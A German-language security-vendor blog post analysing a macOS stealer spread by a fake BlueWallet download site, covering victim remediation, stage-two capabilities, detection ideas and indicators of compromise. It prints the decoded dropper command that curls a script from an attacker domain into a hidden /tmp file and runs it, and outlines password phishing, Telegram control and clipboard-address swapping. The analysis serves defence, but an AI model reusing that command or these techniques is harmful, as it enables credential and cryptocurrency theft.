Privacy, Betrug, Bedrohungsinformationen

Gefälschte BlueWallet-App stiehlt Passwörter, Konten und Kryptowährungen von Macs

von Stefan Dasic | 1. Juni 2026
Gefälschte BlueWallet-App stiehlt Passwörter, Konten und Kryptowährungen von Macs

Eine gefälschte Website, die sich als BlueWallet (eine echte Bitcoin-Wallet) ausgibt, zielt mit einem einfachen, aber wirkungsvollen Angriff auf Mac ab. BlueWallet selbst ist nicht kompromittiert worden. Stattdessen haben Cyberkriminelle den Namen und das Branding der legitimen Bitcoin-Wallet gestohlen, um einen schädlichen Download vertrauenswürdig erscheinen zu lassen.

Wenn Sie nach einer Kryptowährungs-Wallet gesucht haben und auf einer dieser gefälschten BlueWallet-Download-Seiten gelandet sind, hat die Website versucht, Sie dazu zu verleiten, eine heruntergeladene Datei in einem integrierten macOS-Tool zu öffnen und auf „Ausführen“ zu klicken. Wenn Sie diesen Anweisungen gefolgt sind, könnte die Malware gespeicherte Passwörter, Browser-Anmeldedaten, Kryptowährungs-Wallets, Dokumente und andere sensible Daten stehlen. Außerdem überwacht sie die Zwischenablage auf Adressen von Kryptowährungs-Wallets und kann diese durch vom Angreifer kontrollierte Adressen ersetzen.

Diese letzte Funktion ist besonders gefährlich. Wenn Sie vor dem Senden von Geld eine Wallet-Adresse kopieren, kann die Malware diese unbemerkt durch die Adresse des Angreifers ersetzen. Auf dem Bildschirm sieht alles normal aus, doch das Geld landet woanders.

Müssen Sie sich Sorgen machen? Nur, wenn Sie die Datei heruntergeladen und ausgeführt haben. Der bloße Besuch der Seite und das anschließende Schließen haben an sich keine Auswirkungen. Der Angriff hängt vollständig davon ab, dass der Nutzer das Skript öffnet und auf „Abspielen“ klickt.

Falls Sie das Programm dennoch ausgeführt haben, gehen Sie davon aus, dass der Computer kompromittiert ist, und befolgen Sie die nachstehenden Schritte.

Was tun, wenn Sie es möglicherweise ausgeführt haben?

Wenn Sie die Datei geöffnet und auf „Wiedergabe“ geklickt haben, gehen Sie davon aus, dass Ihr Gerät kompromittiert wurde, und führen Sie die folgenden Schritte durch:

  • Trennen Sie das Gerät vom Netzwerk, um den Steuerkanal zu unterbrechen
  • Führen Sie einen vollständigen Scan des Geräts durch und stellen Sie sicher, dass Sie eine aktuelle Sicherheitssoftware verwenden, bei der der Webschutz aktiviert ist
  • Ändern Sie von einem anderen, vertrauenswürdigen Gerät aus die Passwörter für alle auf dem Mac genutzten Konten, angefangen bei E-Mail-Konten und Kryptowährungsbörsen
  • Übertrage beliebige Kryptowährungen in eine neue Wallet, die auf einem sauberen Gerät erstellt wurde
  • Behandle vorhandene Seed-Phrasen und Schlüssel als offengelegt
  • Bevor Sie in Zukunft Kryptowährung senden, überprüfen Sie die vollständige Empfängeradresse Zeichen für Zeichen
  • Suchen Sie nach unbekannten Dateien in ~/Library/LaunchAgents
  • Halte Ausschau nach einem versteckten .sysupd.sh Datei in /tmp
  • Wechseln Sie die Cloud- und SSH-Anmeldedaten, wenn .ssh, .aws, oder .gnupg Auf dem Rechner befanden sich Dateien
  • Im Zweifelsfall sollten Sie Ihre Daten sichern und macOS von einer bekanntermaßen funktionierenden Quelle neu installieren, anstatt zu versuchen, das System an Ort und Stelle zu bereinigen.

Hast du etwas mitgenommen, das du besser nicht hättest mitnehmen sollen?

Social-Engineering-Tricks

Das Interessanteste an dieser Kampagne ist nicht die technische Seite. Die Angreifer haben sich nicht in den Mac gehackt Mac die Sicherheitsvorkehrungen von Apple umgangen. Sie haben die Opfer dazu gebracht, die Malware selbst auszuführen.

Die gefälschte Website führt die Nutzer mit einer überzeugenden Download-Seite, einfachen Anweisungen und sogar einem Tastaturkürzel durch den Vorgang. Der Angriff ist erfolgreich, weil das Opfer dem glaubt, was es sieht.

Da Betriebssysteme immer besser darin werden, schädliche Software zu blockieren, setzen Angreifer zunehmend auf Social Engineering. Anstatt Wege zu finden, Sicherheitskontrollen zu umgehen, bringen sie die Menschen dazu, diese zu umgehen.

Deshalb wird eine Gewohnheit immer wichtiger: Seien Sie misstrauisch gegenüber jedem Download, bei dem Sie aufgefordert werden, ihn in einem Skript-Tool, einem Entwicklerprogramm oder einem Terminalfenster zu öffnen und auf „Ausführen“ zu klicken.

In dieser Kampagne genügte ein einziger Druck auf ⌘R, um einen Mac einen Passwortdieb, einen Dieb von Kryptowährungs-Wallets, einen Entführer von Zwischenablageinhalten und ein Fernzugriffstool zu verwandeln.

Technische Analyse

Schritt 1: Der AppleScript-Downloader

Die Seite ist zu finden unter update-bluewallet[.]com, ein Domainname, der dem echten Wallet ähnlich genug ist (bluewallet.io) auf den ersten Blick. Das Erste, was die Seite tut, ist, nicht auf die Zustimmung zu warten. Ihr Skript ruft eine Download-Routine mit einem Zwei-Sekunden-Timer auf, sobald die Seite geladen wird, und erneut, wenn der Besucher auf eine der beiden Schaltflächen klickt.

Die Datei, die im Ordner „Downloads“ gespeichert wird, heißt BlueWallet Installer.applescript, eine Erweiterung, die die meisten Menschen noch nie gesehen haben und der sie nicht instinktiv misstrauen.

Dann macht die Seite etwas ganz Raffiniertes. Nach einer kurzen Verzögerung formuliert sie ihren eigenen Statustext so um, dass er wie eine Installationsanleitung wirkt: Öffne das Installationsprogramm und drücke dann die Wiedergabetaste oder ⌘R. Sie fügt sogar ein kleines blaues Wiedergabedreieck in den Text ein, damit der Wortlaut mit der tatsächlichen Benutzeroberfläche des Skript-Editors übereinstimmt, die das Opfer gleich zu sehen bekommt.

Gefälschte BlueWallet-Website, die das Opfer durch den Download und die Ausführung des schädlichen Skripts führt

Die Seite führt das Opfer Schritt für Schritt durch die genauen Schritte, die zum Ausführen der Datei erforderlich sind.

Unter dem aktuellen macOS wird eine aus dem Internet heruntergeladene, nicht signierte Anwendung zunächst in Quarantäne verschoben und überprüft, bevor sie ausgeführt werden kann. Ein einfaches Skript, das im Skript-Editor geöffnet und vom Benutzer ausgeführt wird, umgeht diesen Ablauf. Der Benutzer weist ein vertrauenswürdiges Apple-Tool manuell an, den Code auszuführen, sodass keine Notarisierungsprüfung fehlschlagen kann.

Aus diesem Grund hat sich der Angreifer für ein AppleScript anstelle einer gepackten App entschieden: Dadurch wird die riskante Aktion aus den Händen des Betriebssystems in die des Opfers verlagert.

Das AppleScript selbst ist bemerkenswert kurz. Lässt man die dekorativen Kommentare weg – darunter eine gefälschte Versionsnummer und eine Zeile, die vorgibt, es handele sich um ein „Brew Install Upgrade“ –, führt es einen einzigen Base64-kodierten Shell-Befehl aus und weist den Script Editor anschließend an, das Programm ohne zu speichern zu beenden, wodurch die Spuren aus dem Blickfeld verschwinden.

Brew installieren, aktualisieren

Im Klartext bedeutet dieser Befehl Folgendes:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Es ruft ein zweites Skript von einem Remote-Host ab, speichert es in einer versteckten Datei im temporären Verzeichnis, macht es ausführbar und führt es im Hintergrund aus, wobei die gesamte Ausgabe unterdrückt wird.

Das Opfer sieht nichts. Der Dateiname .sysupd.sh ist so getarnt, dass es wie ein System-Update aussieht. Dies ist ein klassischer, in mehreren Phasen arbeitender Dropper: Die erste Phase ist winzig und kurzlebig, und ihre einzige Aufgabe besteht darin, die eigentliche Schadsoftware abzurufen.

Phase zwei: Nutzlastanalyse

In den ersten Zeilen wird festgelegt, wie die Malware funktionieren soll. Sie legt fest umask 077 sodass alles, was es erstellt, nur für den kompromittierten Benutzer lesbar ist, und erstellt dann ein verstecktes, zufällig benanntes Arbeitsverzeichnis unter /tmp ausgesät von /dev/urandom.

Die Konfiguration ist verschleiert, allerdings nur schwach. Eine kleine Funktion namens _xd durchläuft eine Hexadezimalzeichenfolge zeilenweise zu je zwei Zeichen und führt für jedes Byte eine XOR-Operation mit einem fest programmierten, sich wiederholenden Schlüssel durch: swckR9JCD2Uu.

Diese Funktion entschlüsselt zur Laufzeit das Telegram-Bot-Token, die Chat-ID, das sekundäre Befehlstoken und die Staging-URL des Skripts. Das reicht zwar aus, um Tools zu überlisten, die nur nach Klartext-Zeichenfolgen suchen, aber nicht viel mehr. Da sowohl der Schlüssel als auch der Algorithmus in der Datei enthalten sind, lässt sich jeder verschlüsselte Wert vollständig wiederherstellen.

Ein Detail fällt besonders auf: Der entschlüsselte Wert des Telegram-Chats und der entschlüsselte Wert des Command-and-Control-Chats sind identisch. Der Angreifer nutzt einen einzigen Telegram-Kanal sowohl als Speicherort für die exfiltrierten Daten als auch als Kontrollkanal. Diese Methode ist kostengünstig, skalierbar, verschlüsselt und fügt sich nahtlos in den normalen HTTPS-Datenverkehr ein.

Nicht alles ist verschleiert. Die Adressen für die Zwischenablage-Entführung sind im Klartext in der Datei enthalten: eine Bitcoin-Adresse, eine Ethereum-Adresse und eine Solana-Adresse. Dies sind die Adressen, die das Implantat einfügt, sobald es feststellt, dass Sie eine Wallet-Adresse kopieren. Da sie in den jeweiligen Blockchains öffentlich einsehbar sind, gehören sie auch zu den nützlichsten Artefakten in der gesamten Stichprobe.

Was die Malware stiehlt

Die Erfassungsroutinen der zweiten Stufe sind umfassend. Sie stützen sich auf sechs große Kategorien.

1. Webbrowser

Das Skript extrahiert den Verlauf, Cookies, Anmeldedaten und Lesezeichen aus einer Vielzahl von Browsern, darunter:

  • Chromium-basierte Browser: Google Chrome , Beta, Canary und Dev); Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; und Yandex
  • Auf Firefox basierende Browser: Firefox, Waterfox, Pale Moon, Zen und LibreWolf
  • Native Browserdaten unter macOS: Safari-Cookies, Verlauf und Formularwerte

2. Kryptowährungs-Wallets

Dies scheint der Schwerpunkt des Drehbuchs zu sein.

Es richtet sich an Desktop-Wallet-Anwendungen wie Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop und Tonkeeper.

Außerdem richtet es sich an Browser-Erweiterungs-Wallets in verschiedenen Ökosystemen:

  • Bitcoin: Xverse , Leather, UniSat, Alby und Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet und Slope
  • EVM-Wallets: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin und XDEFI
  • Kosmos: Kepler , Station und Cosmostation
  • Weitere Ökosysteme: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos und Temple

3. Passwortmanager und Sicherheitstools

Die Malware zielt auf den lokalen Speicher und die Einstellungen verschiedener Passwortmanager ab, darunter LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt und Buttercup.

Außerdem werden Daten im Zusammenhang mit 2FA- und Authentifizierungs-Apps gesucht, darunter Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS und FreeOTP.

4. Kommunikations- und Social-Media-Apps

Das Skript versucht, Sitzungsdaten und den lokalen Speicher für Telegram Desktop und Discord zu kopieren, einschließlich Discord Canary und Discord PTB.

5. Entwickler- und Cloud-Tools

Es sucht im Home-Verzeichnis des Benutzers nach Anmeldedaten und Konfigurationsdateien, darunter:

  • AWS-CLI-Konfigurationen in .aws
  • SSH-Schlüssel in .ssh
  • GnuPG-Schlüssel in .gnupg
  • Kubernetes-Konfigurationen in .kube
  • Shell- und Git-Dateien, einschließlich .zshrc, .zsh_history, .bash_historyund .gitconfig

6. Produktivitäts-Apps und allgemeine Dateien

Das Skript kopiert die lokale Apple Notes-Datenbank, NoteStore.sqlite.

Außerdem werden Daten von Browser-Erweiterungen gesucht, die mit Shopping- und Produktivitäts-Tools in Verbindung stehen, darunter Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist und Google Keep.

Schließlich durchsucht es die Ordner „Desktop“, „Dokumente“ und „Downloads“ nach Dateien mit den folgenden Dateiendungen: .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pemund .env, unter einer Größenbeschränkung.

Was geschieht mit den gestohlenen Daten?

Die Malware versucht, das Passwort des Benutzerkontos direkt abzufangen. Ein osascript Im Dialogfeld „Systemeinstellungen“ wird der Benutzer aufgefordert, sein Passwort erneut einzugeben, „um fortzufahren“. Das Skript gleicht jeden Versuch mit dscl . authonly bevor es gespeichert wird, sodass es erst dann beendet wird, wenn es über gültige Anmeldedaten verfügt.

Zur Exfiltration archiviert es die vorbereiteten Daten mit dem macOS-eigenen ditto, wahrscheinlich weil es im Gegensatz zu zip. Um das Upload-Limit von 50 MB bei Telegram nicht zu überschreiten, werden größere Archive in 49-MB-Teile aufgeteilt, wobei split vor dem Versand jedes Teils.

Es sorgt für die Persistenz, indem es eine LaunchAgent-Plist in den Ordner des Benutzers schreibt ~/Library/LaunchAgents, gestützt auf ein verstecktes Support-Verzeichnis, und es zu laden mit launchctl damit das Implantat bei jeder Anmeldung erneut ausgeführt wird.

Der „Clipboard Hijack“ ist eine sich im Hintergrund wiederholende Live-Schleife. Ein clip_watch Die Funktion überprüft kontinuierlich die Zwischenablage, gleicht die Adressformate von Bitcoin, Ethereum und Solana mittels regulärer Ausdrücke ab, meldet die ursprüngliche Adresse an den Command-and-Control-Kanal und überschreibt die Zwischenablage mit der Adresse des Angreifers über pbcopy.

Das bedeutet, dass die Ersetzung im Hintergrund beim Kopieren und Einfügen erfolgt.

Schließlich lässt sich die Malware interaktiv steuern. A c2_loop fragt den Telegram-Bot nach Befehlen ab und unterstützt ein umfassendes Operator-Toolkit:

  • /info für Systemdetails
  • /exec für beliebige Shell-Befehle
  • /clipboard den aktuellen Inhalt der Zwischenablage auslesen
  • /download bestimmte Dateien zu extrahieren
  • /exfil um das Diebstahlmodul erneut auszuführen
  • /selfdestruct Spuren zu beseitigen

Dadurch wird der Telegram-Kanal zu einer Echtzeit-Fernsteuerungsverbindung und nicht nur zu einem einseitigen Informationskanal.

Von dem leben, was das Land hergibt – und von Telegram

Das Muster ist bekannt und wird immer häufiger: Man greift auf bewährte Werkzeuge zurück.

Die Auslieferung nutzt Apples eigenen Script Editor aus. Die Konfiguration verbirgt sich hinter einem einfachen XOR-Verschlüsselungsalgorithmus statt hinter gepackten Binärdateien. Der Befehlskanal nutzt die Bot-API von Telegram, die Ausgangsfilter umgehen kann, die einen unbekannten Server melden würden.

Keines dieser Elemente ist für sich genommen neu. Die Wirksamkeit beruht darauf, dass scheinbar legitime Komponenten so miteinander kombiniert werden, dass kein einzelner Schritt einen Alarm auslöst.

Erkennungsmöglichkeiten

Hier geht es weniger um den Köder als vielmehr um die Technik selbst.

Skript-Editor, der eine einzeilige Base64-Kodierung ausführt do shell script dass das Programm sofort beendet wird, ist ein deutliches Verhaltensmerkmal und ein weitaus besseres Erkennungsziel als die kurzlebige Datei der ersten Stufe. Das Gleiche gilt für eine versteckte /tmp/.sysupd.sh heruntergeladen von curl und im Hintergrund gestartet.

Browser und Download-Oberflächen könnten .applescript Dateien, die aus dem Internet stammen, werden mit derselben Skepsis betrachtet wie ausführbare Dateien. Und Telegram bleibt ein noch zu wenig beachtetes Command-and-Control-Medium, dessen Missbrauch durch Bot-Token durch entsprechende Meldungen bereits an der Quelle unterbunden werden könnte.

Anzeichen für eine Kompromittierung

Datei-Hashes (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Netzwerkindikatoren

  • update-bluewallet[.]com
  • projects2026box[.]com

Adressen, die die Zwischenablage kapern

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Wir berichten nicht nur über Bedrohungen - wir beseitigen sie

Cybersecurity-Risiken sollten nie über eine Schlagzeile hinausgehen. Laden Sie noch heute Malwarebytes herunter, um Bedrohungen von Ihren Geräten fernzuhalten.

Über den Autor

Stefan Dasic

Stefan Dasic

Stefan ist ein leidenschaftlicher Anhänger von Antiviren-Lösungen und hat sich schon früh mit Malware-Tests und der Qualitätssicherung von AV-Produkten beschäftigt. Als Teil des Malwarebytes widmet sich Stefan dem Schutz der Kunden und der Gewährleistung ihrer Sicherheit.

NEUESTE ARTIKEL

Nachrichten
Woche der Sicherheit

Eine Woche im Bereich Sicherheit (Mai 25 – Mai 31)

Juni 1, 2026

Eine Liste der Themen, die wir in der Woche vom 25. bis 31. Mai 2026 behandelt haben

Podcast
Ein abgebildetes Vorhängeschloss ist in einen Mikrofonständer eingebaut, wobei Schallwellen von dem Gerät ausgehen.

Zahlungs-Apps hören dir zu (Lock and Code, Staffel 7, Folge 11)

Mai 31, 2026

Diese Woche sprechen wir im „Lock and Code“-Podcast mit Rainey Reitman über finanzielle Zensur, durch die Kunden aus großen Zahlungs-Apps ausgeschlossen werden.

Nachrichten
Signal-Logo

Signal-Nutzer im Visier von Phishing-Angriffen zum Diebstahl von Backups

Mai 29, 2026

Cyberkriminelle geben sich als Signal-Support aus, um Backup-Wiederherstellungsschlüssel zu stehlen, wodurch sie Zugriff auf das gesamte Nachrichtenarchiv der Opfer erhalten.

Verwandte Artikel

Symbol für Mitwirkende

Mitwirkende

Symbol für das Bedrohungszentrum

Bedrohungszentrum

Podcasts-Symbol

Podcast

Glossar-Symbol

Glossar

Symbol für Betrug

Betrug